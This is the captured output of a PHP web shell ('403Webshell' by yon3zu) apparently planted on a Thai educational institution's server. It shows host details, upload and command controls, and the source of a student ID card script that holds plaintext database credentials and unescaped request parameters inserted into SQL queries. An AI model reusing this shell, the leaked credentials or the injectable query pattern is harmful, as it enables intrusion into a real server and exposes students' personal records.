403Webshell
Server IP : 202.29.229.35  /  Your IP : 18.119.120.88
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/stdcard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/stdcard/card_process_level_ok.php
<?php
/*
$host="localhost";
$user_name="root";
$pass_word="1234";
$db="std_card_db";
	*/
$host="localhost";
$user_name="stdcard_db";
$pass_word="Stdcard123";
$db="stdcard_db";
@mysql_connect( $host,$user_name,$pass_word) or die ("can not connect to server");
mysql_query("SET NAMES utf8");
@mysql_select_db($db) or die("can not select database"); 

	$years_c = $_REQUEST['years_c'];
	$level = $_REQUEST['level'];
	$d = $_REQUEST['d'];
	$m = $_REQUEST['m'];
	$y = $_REQUEST['y'];
	$d2 = $_REQUEST['d2'];
	$m2 = $_REQUEST['m2'];
	$y2 = $_REQUEST['y2'];
	
	if(strlen($m)==1) $m = "0".$m;
	if(strlen($m2)==1) $m2 = "0".$m2;
	
	$date_print = $d."/".$m."/". $y;
	$date_expire = $d2."/".$m2."/". $y2;
	
	if($years_c=="" or $level=="" or $d =="" or $m=="" or $y=="" or $d2 =="" or $m2=="" or $y2=="" ){
		echo "กรุณากรอกปีการศึกษาที่เข้า หรือ ระดับการศึกษา หรือ วัน/เดือน/ปี";
		exit();
	}
	
$sql_max = "select max(card_no) from tblstd_idcard  where start_year = '$years_c' ";
$result1 = mysql_query($sql_max);	
$rs_max = mysql_fetch_array($result1);
	$card_no_max = $rs_max['0'];	
	
	if($level==1){
		$sql_process = "select * from tblstd_idcard  where start_year = '$years_c' and substr(student_id,3,1)='2' order by group_id,student_id";
	}elseif($level==2){
		$sql_process = "select * from tblstd_idcard  where  start_year = '$years_c' and substr(student_id,3,1)='3' order by group_id,student_id";
	}
echo "==>".$sql_process."<br>";
$n=0;
echo $sql_process;
$result1 = mysql_query($sql_process);
while($rs_std = mysql_fetch_array($result1)){
	$n++;
	$student_id = 	$rs_std['student_id'];
	$people_id = 	$rs_std['people_id'];
	$perfix_id = 	$rs_std['perfix_id'];
	$stu_fname = 	$rs_std['stu_fname'];
	$stu_lname = 	$rs_std['stu_fname'];
	$start_year = 	$rs_std['start_year'];
	$card_no = 	$rs_std['card_no'];
	
	if($card_no==0) 	{
		$card_no_max++;
		$card_no = $card_no_max;	

		$sql_upd="update tblstd_idcard set card_no = '$card_no', date_print = '$date_print', date_expire='$date_expire' where student_id = '$student_id' ";
		$result = mysql_query($sql_upd);
	}	
		echo $n."=>".$student_id."=>".$stu_fname ." ".$stu_lname."=>".$card_no_show."=>".$date_print."=>".$date_expire."<br>";
} // end while
?>

Youez - 2016 - github.com/yon3zu
LinuXploit